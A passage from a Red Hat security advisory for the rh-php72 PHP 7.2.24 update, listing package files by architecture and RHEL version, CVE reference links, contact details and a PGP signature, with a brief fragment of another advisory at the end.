rh-php72-php-7.2.24-1.el7.aarch64.rpm rh-php72-php-bcmath-7.2.24-1.el7.aarch64.rpm rh-php72-php-cli-7.2.24-1.el7.aarch64.rpm rh-php72-php-common-7.2.24-1.el7.aarch64.rpm rh-php72-php-dba-7.2.24-1.el7.aarch64.rpm rh-php72-php-dbg-7.2.24-1.el7.aarch64.rpm rh-php72-php-debuginfo-7.2.24-1.el7.aarch64.rpm rh-php72-php-devel-7.2.24-1.el7.aarch64.rpm rh-php72-php-embedded-7.2.24-1.el7.aarch64.rpm rh-php72-php-enchant-7.2.24-1.el7.aarch64.rpm rh-php72-php-fpm-7.2.24-1.el7.aarch64.rpm rh-php72-php-gd-7.2.24-1.el7.aarch64.rpm rh-php72-php-gmp-7.2.24-1.el7.aarch64.rpm rh-php72-php-intl-7.2.24-1.el7.aarch64.rpm rh-php72-php-json-7.2.24-1.el7.aarch64.rpm rh-php72-php-ldap-7.2.24-1.el7.aarch64.rpm rh-php72-php-mbstring-7.2.24-1.el7.aarch64.rpm rh-php72-php-mysqlnd-7.2.24-1.el7.aarch64.rpm rh-php72-php-odbc-7.2.24-1.el7.aarch64.rpm rh-php72-php-opcache-7.2.24-1.el7.aarch64.rpm rh-php72-php-pdo-7.2.24-1.el7.aarch64.rpm rh-php72-php-pgsql-7.2.24-1.el7.aarch64.rpm rh-php72-php-process-7.2.24-1.el7.aarch64.rpm rh-php72-php-pspell-7.2.24-1.el7.aarch64.rpm rh-php72-php-recode-7.2.24-1.el7.aarch64.rpm rh-php72-php-snmp-7.2.24-1.el7.aarch64.rpm rh-php72-php-soap-7.2.24-1.el7.aarch64.rpm rh-php72-php-xml-7.2.24-1.el7.aarch64.rpm rh-php72-php-xmlrpc-7.2.24-1.el7.aarch64.rpm rh-php72-php-zip-7.2.24-1.el7.aarch64.rpm ppc64le: rh-php72-php-7.2.24-1.el7.ppc64le.rpm rh-php72-php-bcmath-7.2.24-1.el7.ppc64le.rpm rh-php72-php-cli-7.2.24-1.el7.ppc64le.rpm rh-php72-php-common-7.2.24-1.el7.ppc64le.rpm rh-php72-php-dba-7.2.24-1.el7.ppc64le.rpm rh-php72-php-dbg-7.2.24-1.el7.ppc64le.rpm rh-php72-php-debuginfo-7.2.24-1.el7.ppc64le.rpm rh-php72-php-devel-7.2.24-1.el7.ppc64le.rpm rh-php72-php-embedded-7.2.24-1.el7.ppc64le.rpm rh-php72-php-enchant-7.2.24-1.el7.ppc64le.rpm rh-php72-php-fpm-7.2.24-1.el7.ppc64le.rpm rh-php72-php-gd-7.2.24-1.el7.ppc64le.rpm rh-php72-php-gmp-7.2.24-1.el7.ppc64le.rpm rh-php72-php-intl-7.2.24-1.el7.ppc64le.rpm rh-php72-php-json-7.2.24-1.el7.ppc64le.rpm rh-php72-php-ldap-7.2.24-1.el7.ppc64le.rpm rh-php72-php-mbstring-7.2.24-1.el7.ppc64le.rpm rh-php72-php-mysqlnd-7.2.24-1.el7.ppc64le.rpm rh-php72-php-odbc-7.2.24-1.el7.ppc64le.rpm rh-php72-php-opcache-7.2.24-1.el7.ppc64le.rpm rh-php72-php-pdo-7.2.24-1.el7.ppc64le.rpm rh-php72-php-pgsql-7.2.24-1.el7.ppc64le.rpm rh-php72-php-process-7.2.24-1.el7.ppc64le.rpm rh-php72-php-pspell-7.2.24-1.el7.ppc64le.rpm rh-php72-php-recode-7.2.24-1.el7.ppc64le.rpm rh-php72-php-snmp-7.2.24-1.el7.ppc64le.rpm rh-php72-php-soap-7.2.24-1.el7.ppc64le.rpm rh-php72-php-xml-7.2.24-1.el7.ppc64le.rpm rh-php72-php-xmlrpc-7.2.24-1.el7.ppc64le.rpm rh-php72-php-zip-7.2.24-1.el7.ppc64le.rpm s390x: rh-php72-php-7.2.24-1.el7.s390x.rpm rh-php72-php-bcmath-7.2.24-1.el7.s390x.rpm rh-php72-php-cli-7.2.24-1.el7.s390x.rpm rh-php72-php-common-7.2.24-1.el7.s390x.rpm rh-php72-php-dba-7.2.24-1.el7.s390x.rpm rh-php72-php-dbg-7.2.24-1.el7.s390x.rpm rh-php72-php-debuginfo-7.2.24-1.el7.s390x.rpm rh-php72-php-devel-7.2.24-1.el7.s390x.rpm rh-php72-php-embedded-7.2.24-1.el7.s390x.rpm rh-php72-php-enchant-7.2.24-1.el7.s390x.rpm rh-php72-php-fpm-7.2.24-1.el7.s390x.rpm rh-php72-php-gd-7.2.24-1.el7.s390x.rpm rh-php72-php-gmp-7.2.24-1.el7.s390x.rpm rh-php72-php-intl-7.2.24-1.el7.s390x.rpm rh-php72-php-json-7.2.24-1.el7.s390x.rpm rh-php72-php-ldap-7.2.24-1.el7.s390x.rpm rh-php72-php-mbstring-7.2.24-1.el7.s390x.rpm rh-php72-php-mysqlnd-7.2.24-1.el7.s390x.rpm rh-php72-php-odbc-7.2.24-1.el7.s390x.rpm rh-php72-php-opcache-7.2.24-1.el7.s390x.rpm rh-php72-php-pdo-7.2.24-1.el7.s390x.rpm rh-php72-php-pgsql-7.2.24-1.el7.s390x.rpm rh-php72-php-process-7.2.24-1.el7.s390x.rpm rh-php72-php-pspell-7.2.24-1.el7.s390x.rpm rh-php72-php-recode-7.2.24-1.el7.s390x.rpm rh-php72-php-snmp-7.2.24-1.el7.s390x.rpm rh-php72-php-soap-7.2.24-1.el7.s390x.rpm rh-php72-php-xml-7.2.24-1.el7.s390x.rpm rh-php72-php-xmlrpc-7.2.24-1.el7.s390x.rpm rh-php72-php-zip-7.2.24-1.el7.s390x.rpm x86_64: rh-php72-php-7.2.24-1.el7.x86_64.rpm rh-php72-php-bcmath-7.2.24-1.el7.x86_64.rpm rh-php72-php-cli-7.2.24-1.el7.x86_64.rpm rh-php72-php-common-7.2.24-1.el7.x86_64.rpm rh-php72-php-dba-7.2.24-1.el7.x86_64.rpm rh-php72-php-dbg-7.2.24-1.el7.x86_64.rpm rh-php72-php-debuginfo-7.2.24-1.el7.x86_64.rpm rh-php72-php-devel-7.2.24-1.el7.x86_64.rpm rh-php72-php-embedded-7.2.24-1.el7.x86_64.rpm rh-php72-php-enchant-7.2.24-1.el7.x86_64.rpm rh-php72-php-fpm-7.2.24-1.el7.x86_64.rpm rh-php72-php-gd-7.2.24-1.el7.x86_64.rpm rh-php72-php-gmp-7.2.24-1.el7.x86_64.rpm rh-php72-php-intl-7.2.24-1.el7.x86_64.rpm rh-php72-php-json-7.2.24-1.el7.x86_64.rpm rh-php72-php-ldap-7.2.24-1.el7.x86_64.rpm rh-php72-php-mbstring-7.2.24-1.el7.x86_64.rpm rh-php72-php-mysqlnd-7.2.24-1.el7.x86_64.rpm rh-php72-php-odbc-7.2.24-1.el7.x86_64.rpm rh-php72-php-opcache-7.2.24-1.el7.x86_64.rpm rh-php72-php-pdo-7.2.24-1.el7.x86_64.rpm rh-php72-php-pgsql-7.2.24-1.el7.x86_64.rpm rh-php72-php-process-7.2.24-1.el7.x86_64.rpm rh-php72-php-pspell-7.2.24-1.el7.x86_64.rpm rh-php72-php-recode-7.2.24-1.el7.x86_64.rpm rh-php72-php-snmp-7.2.24-1.el7.x86_64.rpm rh-php72-php-soap-7.2.24-1.el7.x86_64.rpm rh-php72-php-xml-7.2.24-1.el7.x86_64.rpm rh-php72-php-xmlrpc-7.2.24-1.el7.x86_64.rpm rh-php72-php-zip-7.2.24-1.el7.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5): Source: rh-php72-php-7.2.24-1.el7.src.rpm ppc64le: rh-php72-php-7.2.24-1.el7.ppc64le.rpm rh-php72-php-bcmath-7.2.24-1.el7.ppc64le.rpm rh-php72-php-cli-7.2.24-1.el7.ppc64le.rpm rh-php72-php-common-7.2.24-1.el7.ppc64le.rpm rh-php72-php-dba-7.2.24-1.el7.ppc64le.rpm rh-php72-php-dbg-7.2.24-1.el7.ppc64le.rpm rh-php72-php-debuginfo-7.2.24-1.el7.ppc64le.rpm rh-php72-php-devel-7.2.24-1.el7.ppc64le.rpm rh-php72-php-embedded-7.2.24-1.el7.ppc64le.rpm rh-php72-php-enchant-7.2.24-1.el7.ppc64le.rpm rh-php72-php-fpm-7.2.24-1.el7.ppc64le.rpm rh-php72-php-gd-7.2.24-1.el7.ppc64le.rpm rh-php72-php-gmp-7.2.24-1.el7.ppc64le.rpm rh-php72-php-intl-7.2.24-1.el7.ppc64le.rpm rh-php72-php-json-7.2.24-1.el7.ppc64le.rpm rh-php72-php-ldap-7.2.24-1.el7.ppc64le.rpm rh-php72-php-mbstring-7.2.24-1.el7.ppc64le.rpm rh-php72-php-mysqlnd-7.2.24-1.el7.ppc64le.rpm rh-php72-php-odbc-7.2.24-1.el7.ppc64le.rpm rh-php72-php-opcache-7.2.24-1.el7.ppc64le.rpm rh-php72-php-pdo-7.2.24-1.el7.ppc64le.rpm rh-php72-php-pgsql-7.2.24-1.el7.ppc64le.rpm rh-php72-php-process-7.2.24-1.el7.ppc64le.rpm rh-php72-php-pspell-7.2.24-1.el7.ppc64le.rpm rh-php72-php-recode-7.2.24-1.el7.ppc64le.rpm rh-php72-php-snmp-7.2.24-1.el7.ppc64le.rpm rh-php72-php-soap-7.2.24-1.el7.ppc64le.rpm rh-php72-php-xml-7.2.24-1.el7.ppc64le.rpm rh-php72-php-xmlrpc-7.2.24-1.el7.ppc64le.rpm rh-php72-php-zip-7.2.24-1.el7.ppc64le.rpm s390x: rh-php72-php-7.2.24-1.el7.s390x.rpm rh-php72-php-bcmath-7.2.24-1.el7.s390x.rpm rh-php72-php-cli-7.2.24-1.el7.s390x.rpm rh-php72-php-common-7.2.24-1.el7.s390x.rpm rh-php72-php-dba-7.2.24-1.el7.s390x.rpm rh-php72-php-dbg-7.2.24-1.el7.s390x.rpm rh-php72-php-debuginfo-7.2.24-1.el7.s390x.rpm rh-php72-php-devel-7.2.24-1.el7.s390x.rpm rh-php72-php-embedded-7.2.24-1.el7.s390x.rpm rh-php72-php-enchant-7.2.24-1.el7.s390x.rpm rh-php72-php-fpm-7.2.24-1.el7.s390x.rpm rh-php72-php-gd-7.2.24-1.el7.s390x.rpm rh-php72-php-gmp-7.2.24-1.el7.s390x.rpm rh-php72-php-intl-7.2.24-1.el7.s390x.rpm rh-php72-php-json-7.2.24-1.el7.s390x.rpm rh-php72-php-ldap-7.2.24-1.el7.s390x.rpm rh-php72-php-mbstring-7.2.24-1.el7.s390x.rpm rh-php72-php-mysqlnd-7.2.24-1.el7.s390x.rpm rh-php72-php-odbc-7.2.24-1.el7.s390x.rpm rh-php72-php-opcache-7.2.24-1.el7.s390x.rpm rh-php72-php-pdo-7.2.24-1.el7.s390x.rpm rh-php72-php-pgsql-7.2.24-1.el7.s390x.rpm rh-php72-php-process-7.2.24-1.el7.s390x.rpm rh-php72-php-pspell-7.2.24-1.el7.s390x.rpm rh-php72-php-recode-7.2.24-1.el7.s390x.rpm rh-php72-php-snmp-7.2.24-1.el7.s390x.rpm rh-php72-php-soap-7.2.24-1.el7.s390x.rpm rh-php72-php-xml-7.2.24-1.el7.s390x.rpm rh-php72-php-xmlrpc-7.2.24-1.el7.s390x.rpm rh-php72-php-zip-7.2.24-1.el7.s390x.rpm x86_64: rh-php72-php-7.2.24-1.el7.x86_64.rpm rh-php72-php-bcmath-7.2.24-1.el7.x86_64.rpm rh-php72-php-cli-7.2.24-1.el7.x86_64.rpm rh-php72-php-common-7.2.24-1.el7.x86_64.rpm rh-php72-php-dba-7.2.24-1.el7.x86_64.rpm rh-php72-php-dbg-7.2.24-1.el7.x86_64.rpm rh-php72-php-debuginfo-7.2.24-1.el7.x86_64.rpm rh-php72-php-devel-7.2.24-1.el7.x86_64.rpm rh-php72-php-embedded-7.2.24-1.el7.x86_64.rpm rh-php72-php-enchant-7.2.24-1.el7.x86_64.rpm rh-php72-php-fpm-7.2.24-1.el7.x86_64.rpm rh-php72-php-gd-7.2.24-1.el7.x86_64.rpm rh-php72-php-gmp-7.2.24-1.el7.x86_64.rpm rh-php72-php-intl-7.2.24-1.el7.x86_64.rpm rh-php72-php-json-7.2.24-1.el7.x86_64.rpm rh-php72-php-ldap-7.2.24-1.el7.x86_64.rpm rh-php72-php-mbstring-7.2.24-1.el7.x86_64.rpm rh-php72-php-mysqlnd-7.2.24-1.el7.x86_64.rpm rh-php72-php-odbc-7.2.24-1.el7.x86_64.rpm rh-php72-php-opcache-7.2.24-1.el7.x86_64.rpm rh-php72-php-pdo-7.2.24-1.el7.x86_64.rpm rh-php72-php-pgsql-7.2.24-1.el7.x86_64.rpm rh-php72-php-process-7.2.24-1.el7.x86_64.rpm rh-php72-php-pspell-7.2.24-1.el7.x86_64.rpm rh-php72-php-recode-7.2.24-1.el7.x86_64.rpm rh-php72-php-snmp-7.2.24-1.el7.x86_64.rpm rh-php72-php-soap-7.2.24-1.el7.x86_64.rpm rh-php72-php-xml-7.2.24-1.el7.x86_64.rpm rh-php72-php-xmlrpc-7.2.24-1.el7.x86_64.rpm rh-php72-php-zip-7.2.24-1.el7.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6): Source: rh-php72-php-7.2.24-1.el7.src.rpm ppc64le: rh-php72-php-7.2.24-1.el7.ppc64le.rpm rh-php72-php-bcmath-7.2.24-1.el7.ppc64le.rpm rh-php72-php-cli-7.2.24-1.el7.ppc64le.rpm rh-php72-php-common-7.2.24-1.el7.ppc64le.rpm rh-php72-php-dba-7.2.24-1.el7.ppc64le.rpm rh-php72-php-dbg-7.2.24-1.el7.ppc64le.rpm rh-php72-php-debuginfo-7.2.24-1.el7.ppc64le.rpm rh-php72-php-devel-7.2.24-1.el7.ppc64le.rpm rh-php72-php-embedded-7.2.24-1.el7.ppc64le.rpm rh-php72-php-enchant-7.2.24-1.el7.ppc64le.rpm rh-php72-php-fpm-7.2.24-1.el7.ppc64le.rpm rh-php72-php-gd-7.2.24-1.el7.ppc64le.rpm rh-php72-php-gmp-7.2.24-1.el7.ppc64le.rpm rh-php72-php-intl-7.2.24-1.el7.ppc64le.rpm rh-php72-php-json-7.2.24-1.el7.ppc64le.rpm rh-php72-php-ldap-7.2.24-1.el7.ppc64le.rpm rh-php72-php-mbstring-7.2.24-1.el7.ppc64le.rpm rh-php72-php-mysqlnd-7.2.24-1.el7.ppc64le.rpm rh-php72-php-odbc-7.2.24-1.el7.ppc64le.rpm rh-php72-php-opcache-7.2.24-1.el7.ppc64le.rpm rh-php72-php-pdo-7.2.24-1.el7.ppc64le.rpm rh-php72-php-pgsql-7.2.24-1.el7.ppc64le.rpm rh-php72-php-process-7.2.24-1.el7.ppc64le.rpm rh-php72-php-pspell-7.2.24-1.el7.ppc64le.rpm rh-php72-php-recode-7.2.24-1.el7.ppc64le.rpm rh-php72-php-snmp-7.2.24-1.el7.ppc64le.rpm rh-php72-php-soap-7.2.24-1.el7.ppc64le.rpm rh-php72-php-xml-7.2.24-1.el7.ppc64le.rpm rh-php72-php-xmlrpc-7.2.24-1.el7.ppc64le.rpm rh-php72-php-zip-7.2.24-1.el7.ppc64le.rpm s390x: rh-php72-php-7.2.24-1.el7.s390x.rpm rh-php72-php-bcmath-7.2.24-1.el7.s390x.rpm rh-php72-php-cli-7.2.24-1.el7.s390x.rpm rh-php72-php-common-7.2.24-1.el7.s390x.rpm rh-php72-php-dba-7.2.24-1.el7.s390x.rpm rh-php72-php-dbg-7.2.24-1.el7.s390x.rpm rh-php72-php-debuginfo-7.2.24-1.el7.s390x.rpm rh-php72-php-devel-7.2.24-1.el7.s390x.rpm rh-php72-php-embedded-7.2.24-1.el7.s390x.rpm rh-php72-php-enchant-7.2.24-1.el7.s390x.rpm rh-php72-php-fpm-7.2.24-1.el7.s390x.rpm rh-php72-php-gd-7.2.24-1.el7.s390x.rpm rh-php72-php-gmp-7.2.24-1.el7.s390x.rpm rh-php72-php-intl-7.2.24-1.el7.s390x.rpm rh-php72-php-json-7.2.24-1.el7.s390x.rpm rh-php72-php-ldap-7.2.24-1.el7.s390x.rpm rh-php72-php-mbstring-7.2.24-1.el7.s390x.rpm rh-php72-php-mysqlnd-7.2.24-1.el7.s390x.rpm rh-php72-php-odbc-7.2.24-1.el7.s390x.rpm rh-php72-php-opcache-7.2.24-1.el7.s390x.rpm rh-php72-php-pdo-7.2.24-1.el7.s390x.rpm rh-php72-php-pgsql-7.2.24-1.el7.s390x.rpm rh-php72-php-process-7.2.24-1.el7.s390x.rpm rh-php72-php-pspell-7.2.24-1.el7.s390x.rpm rh-php72-php-recode-7.2.24-1.el7.s390x.rpm rh-php72-php-snmp-7.2.24-1.el7.s390x.rpm rh-php72-php-soap-7.2.24-1.el7.s390x.rpm rh-php72-php-xml-7.2.24-1.el7.s390x.rpm rh-php72-php-xmlrpc-7.2.24-1.el7.s390x.rpm rh-php72-php-zip-7.2.24-1.el7.s390x.rpm x86_64: rh-php72-php-7.2.24-1.el7.x86_64.rpm rh-php72-php-bcmath-7.2.24-1.el7.x86_64.rpm rh-php72-php-cli-7.2.24-1.el7.x86_64.rpm rh-php72-php-common-7.2.24-1.el7.x86_64.rpm rh-php72-php-dba-7.2.24-1.el7.x86_64.rpm rh-php72-php-dbg-7.2.24-1.el7.x86_64.rpm rh-php72-php-debuginfo-7.2.24-1.el7.x86_64.rpm rh-php72-php-devel-7.2.24-1.el7.x86_64.rpm rh-php72-php-embedded-7.2.24-1.el7.x86_64.rpm rh-php72-php-enchant-7.2.24-1.el7.x86_64.rpm rh-php72-php-fpm-7.2.24-1.el7.x86_64.rpm rh-php72-php-gd-7.2.24-1.el7.x86_64.rpm rh-php72-php-gmp-7.2.24-1.el7.x86_64.rpm rh-php72-php-intl-7.2.24-1.el7.x86_64.rpm rh-php72-php-json-7.2.24-1.el7.x86_64.rpm rh-php72-php-ldap-7.2.24-1.el7.x86_64.rpm rh-php72-php-mbstring-7.2.24-1.el7.x86_64.rpm rh-php72-php-mysqlnd-7.2.24-1.el7.x86_64.rpm rh-php72-php-odbc-7.2.24-1.el7.x86_64.rpm rh-php72-php-opcache-7.2.24-1.el7.x86_64.rpm rh-php72-php-pdo-7.2.24-1.el7.x86_64.rpm rh-php72-php-pgsql-7.2.24-1.el7.x86_64.rpm rh-php72-php-process-7.2.24-1.el7.x86_64.rpm rh-php72-php-pspell-7.2.24-1.el7.x86_64.rpm rh-php72-php-recode-7.2.24-1.el7.x86_64.rpm rh-php72-php-snmp-7.2.24-1.el7.x86_64.rpm rh-php72-php-soap-7.2.24-1.el7.x86_64.rpm rh-php72-php-xml-7.2.24-1.el7.x86_64.rpm rh-php72-php-xmlrpc-7.2.24-1.el7.x86_64.rpm rh-php72-php-zip-7.2.24-1.el7.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7): Source: rh-php72-php-7.2.24-1.el7.src.rpm ppc64le: rh-php72-php-7.2.24-1.el7.ppc64le.rpm rh-php72-php-bcmath-7.2.24-1.el7.ppc64le.rpm rh-php72-php-cli-7.2.24-1.el7.ppc64le.rpm rh-php72-php-common-7.2.24-1.el7.ppc64le.rpm rh-php72-php-dba-7.2.24-1.el7.ppc64le.rpm rh-php72-php-dbg-7.2.24-1.el7.ppc64le.rpm rh-php72-php-debuginfo-7.2.24-1.el7.ppc64le.rpm rh-php72-php-devel-7.2.24-1.el7.ppc64le.rpm rh-php72-php-embedded-7.2.24-1.el7.ppc64le.rpm rh-php72-php-enchant-7.2.24-1.el7.ppc64le.rpm rh-php72-php-fpm-7.2.24-1.el7.ppc64le.rpm rh-php72-php-gd-7.2.24-1.el7.ppc64le.rpm rh-php72-php-gmp-7.2.24-1.el7.ppc64le.rpm rh-php72-php-intl-7.2.24-1.el7.ppc64le.rpm rh-php72-php-json-7.2.24-1.el7.ppc64le.rpm rh-php72-php-ldap-7.2.24-1.el7.ppc64le.rpm rh-php72-php-mbstring-7.2.24-1.el7.ppc64le.rpm rh-php72-php-mysqlnd-7.2.24-1.el7.ppc64le.rpm rh-php72-php-odbc-7.2.24-1.el7.ppc64le.rpm rh-php72-php-opcache-7.2.24-1.el7.ppc64le.rpm rh-php72-php-pdo-7.2.24-1.el7.ppc64le.rpm rh-php72-php-pgsql-7.2.24-1.el7.ppc64le.rpm rh-php72-php-process-7.2.24-1.el7.ppc64le.rpm rh-php72-php-pspell-7.2.24-1.el7.ppc64le.rpm rh-php72-php-recode-7.2.24-1.el7.ppc64le.rpm rh-php72-php-snmp-7.2.24-1.el7.ppc64le.rpm rh-php72-php-soap-7.2.24-1.el7.ppc64le.rpm rh-php72-php-xml-7.2.24-1.el7.ppc64le.rpm rh-php72-php-xmlrpc-7.2.24-1.el7.ppc64le.rpm rh-php72-php-zip-7.2.24-1.el7.ppc64le.rpm s390x: rh-php72-php-7.2.24-1.el7.s390x.rpm rh-php72-php-bcmath-7.2.24-1.el7.s390x.rpm rh-php72-php-cli-7.2.24-1.el7.s390x.rpm rh-php72-php-common-7.2.24-1.el7.s390x.rpm rh-php72-php-dba-7.2.24-1.el7.s390x.rpm rh-php72-php-dbg-7.2.24-1.el7.s390x.rpm rh-php72-php-debuginfo-7.2.24-1.el7.s390x.rpm rh-php72-php-devel-7.2.24-1.el7.s390x.rpm rh-php72-php-embedded-7.2.24-1.el7.s390x.rpm rh-php72-php-enchant-7.2.24-1.el7.s390x.rpm rh-php72-php-fpm-7.2.24-1.el7.s390x.rpm rh-php72-php-gd-7.2.24-1.el7.s390x.rpm rh-php72-php-gmp-7.2.24-1.el7.s390x.rpm rh-php72-php-intl-7.2.24-1.el7.s390x.rpm rh-php72-php-json-7.2.24-1.el7.s390x.rpm rh-php72-php-ldap-7.2.24-1.el7.s390x.rpm rh-php72-php-mbstring-7.2.24-1.el7.s390x.rpm rh-php72-php-mysqlnd-7.2.24-1.el7.s390x.rpm rh-php72-php-odbc-7.2.24-1.el7.s390x.rpm rh-php72-php-opcache-7.2.24-1.el7.s390x.rpm rh-php72-php-pdo-7.2.24-1.el7.s390x.rpm rh-php72-php-pgsql-7.2.24-1.el7.s390x.rpm rh-php72-php-process-7.2.24-1.el7.s390x.rpm rh-php72-php-pspell-7.2.24-1.el7.s390x.rpm rh-php72-php-recode-7.2.24-1.el7.s390x.rpm rh-php72-php-snmp-7.2.24-1.el7.s390x.rpm rh-php72-php-soap-7.2.24-1.el7.s390x.rpm rh-php72-php-xml-7.2.24-1.el7.s390x.rpm rh-php72-php-xmlrpc-7.2.24-1.el7.s390x.rpm rh-php72-php-zip-7.2.24-1.el7.s390x.rpm x86_64: rh-php72-php-7.2.24-1.el7.x86_64.rpm rh-php72-php-bcmath-7.2.24-1.el7.x86_64.rpm rh-php72-php-cli-7.2.24-1.el7.x86_64.rpm rh-php72-php-common-7.2.24-1.el7.x86_64.rpm rh-php72-php-dba-7.2.24-1.el7.x86_64.rpm rh-php72-php-dbg-7.2.24-1.el7.x86_64.rpm rh-php72-php-debuginfo-7.2.24-1.el7.x86_64.rpm rh-php72-php-devel-7.2.24-1.el7.x86_64.rpm rh-php72-php-embedded-7.2.24-1.el7.x86_64.rpm rh-php72-php-enchant-7.2.24-1.el7.x86_64.rpm rh-php72-php-fpm-7.2.24-1.el7.x86_64.rpm rh-php72-php-gd-7.2.24-1.el7.x86_64.rpm rh-php72-php-gmp-7.2.24-1.el7.x86_64.rpm rh-php72-php-intl-7.2.24-1.el7.x86_64.rpm rh-php72-php-json-7.2.24-1.el7.x86_64.rpm rh-php72-php-ldap-7.2.24-1.el7.x86_64.rpm rh-php72-php-mbstring-7.2.24-1.el7.x86_64.rpm rh-php72-php-mysqlnd-7.2.24-1.el7.x86_64.rpm rh-php72-php-odbc-7.2.24-1.el7.x86_64.rpm rh-php72-php-opcache-7.2.24-1.el7.x86_64.rpm rh-php72-php-pdo-7.2.24-1.el7.x86_64.rpm rh-php72-php-pgsql-7.2.24-1.el7.x86_64.rpm rh-php72-php-process-7.2.24-1.el7.x86_64.rpm rh-php72-php-pspell-7.2.24-1.el7.x86_64.rpm rh-php72-php-recode-7.2.24-1.el7.x86_64.rpm rh-php72-php-snmp-7.2.24-1.el7.x86_64.rpm rh-php72-php-soap-7.2.24-1.el7.x86_64.rpm rh-php72-php-xml-7.2.24-1.el7.x86_64.rpm rh-php72-php-xmlrpc-7.2.24-1.el7.x86_64.rpm rh-php72-php-zip-7.2.24-1.el7.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7): Source: rh-php72-php-7.2.24-1.el7.src.rpm x86_64: rh-php72-php-7.2.24-1.el7.x86_64.rpm rh-php72-php-bcmath-7.2.24-1.el7.x86_64.rpm rh-php72-php-cli-7.2.24-1.el7.x86_64.rpm rh-php72-php-common-7.2.24-1.el7.x86_64.rpm rh-php72-php-dba-7.2.24-1.el7.x86_64.rpm rh-php72-php-dbg-7.2.24-1.el7.x86_64.rpm rh-php72-php-debuginfo-7.2.24-1.el7.x86_64.rpm rh-php72-php-devel-7.2.24-1.el7.x86_64.rpm rh-php72-php-embedded-7.2.24-1.el7.x86_64.rpm rh-php72-php-enchant-7.2.24-1.el7.x86_64.rpm rh-php72-php-fpm-7.2.24-1.el7.x86_64.rpm rh-php72-php-gd-7.2.24-1.el7.x86_64.rpm rh-php72-php-gmp-7.2.24-1.el7.x86_64.rpm rh-php72-php-intl-7.2.24-1.el7.x86_64.rpm rh-php72-php-json-7.2.24-1.el7.x86_64.rpm rh-php72-php-ldap-7.2.24-1.el7.x86_64.rpm rh-php72-php-mbstring-7.2.24-1.el7.x86_64.rpm rh-php72-php-mysqlnd-7.2.24-1.el7.x86_64.rpm rh-php72-php-odbc-7.2.24-1.el7.x86_64.rpm rh-php72-php-opcache-7.2.24-1.el7.x86_64.rpm rh-php72-php-pdo-7.2.24-1.el7.x86_64.rpm rh-php72-php-pgsql-7.2.24-1.el7.x86_64.rpm rh-php72-php-process-7.2.24-1.el7.x86_64.rpm rh-php72-php-pspell-7.2.24-1.el7.x86_64.rpm rh-php72-php-recode-7.2.24-1.el7.x86_64.rpm rh-php72-php-snmp-7.2.24-1.el7.x86_64.rpm rh-php72-php-soap-7.2.24-1.el7.x86_64.rpm rh-php72-php-xml-7.2.24-1.el7.x86_64.rpm rh-php72-php-xmlrpc-7.2.24-1.el7.x86_64.rpm rh-php72-php-zip-7.2.24-1.el7.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2016-10166 https://access.redhat.com/security/cve/CVE-2018-20783 https://access.redhat.com/security/cve/CVE-2019-6977 https://access.redhat.com/security/cve/CVE-2019-9020 https://access.redhat.com/security/cve/CVE-2019-9021 https://access.redhat.com/security/cve/CVE-2019-9022 https://access.redhat.com/security/cve/CVE-2019-9023 https://access.redhat.com/security/cve/CVE-2019-9024 https://access.redhat.com/security/cve/CVE-2019-9637 https://access.redhat.com/security/cve/CVE-2019-9638 https://access.redhat.com/security/cve/CVE-2019-9639 https://access.redhat.com/security/cve/CVE-2019-9640 https://access.redhat.com/security/cve/CVE-2019-11034 https://access.redhat.com/security/cve/CVE-2019-11035 https://access.redhat.com/security/cve/CVE-2019-11036 https://access.redhat.com/security/cve/CVE-2019-11038 https://access.redhat.com/security/cve/CVE-2019-11039 https://access.redhat.com/security/cve/CVE-2019-11040 https://access.redhat.com/security/cve/CVE-2019-11041 https://access.redhat.com/security/cve/CVE-2019-11042 https://access.redhat.com/security/cve/CVE-2019-11043 https://access.redhat.com/security/updates/classification/#critical 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBXbwslNzjgjWX9erEAQgZrA//YpBwARJTytrbpWQquZ4hnjbScNEZK1d4 sOOT+oiQSrzvghsNKNCKwEO1CLbNA9XOT7bCchtpD/HguTc4XeGNk7dAf/qA6UVB tJCxmqNBVBKqoe9UafmxLUFcVSkv/PHRVD2h+/TvmqdB8Uf2Z8hIIaBt7UsW34sb yBMLJVhyG98c/7VzwqFXW6Vm+Ly6+/ViYtloe5/Ex4D8FvB72Cc9uRvCTWdLLOXu PlwQKdaEt5CtUrTmLFEX+9t6tybwhNBf/dZ96nazCaSRtQVnhZI9s+wjoE6vEOOB +bOldvJ9tu7LclzMIz7SbSqjhPBSLtEMGZKcO1havVGDwcfPAEc12TW9DtVFDlqA Xq+dFW5vviRCoMlSmNBmSqQZSWMF64LdzjvWfW2G/nBnNLOdhu/Wufs1sJUOc+cp V9PgQH0iWut0N89DaOzTH+4PQvvvTw12HuKHk+P+/O8bBBdcI9gpd5klce/5jquc QXqhy49koz6BturNpVnXfSWjdLPwQ1pwhGJOkv7vLsdx6HVeuY6BsSE+C28cHFl+ z/AOZL4eCa9xKlePdGKCbqzTjMmCiJQbeShoBOKt1DtSgVVgtE0Kc5EZQcqop0aw RG304k1HSbrgsSRFxx6s1RophOQaC3ASvWkw5OY/8ylNrO9AAMxLRjZNCve6V7Rq 86WRMpuQxpE= =winR -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . 8) - aarch64, noarch, ppc64le, s390x, x86_64 3. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.2 Release Notes linked from the References section

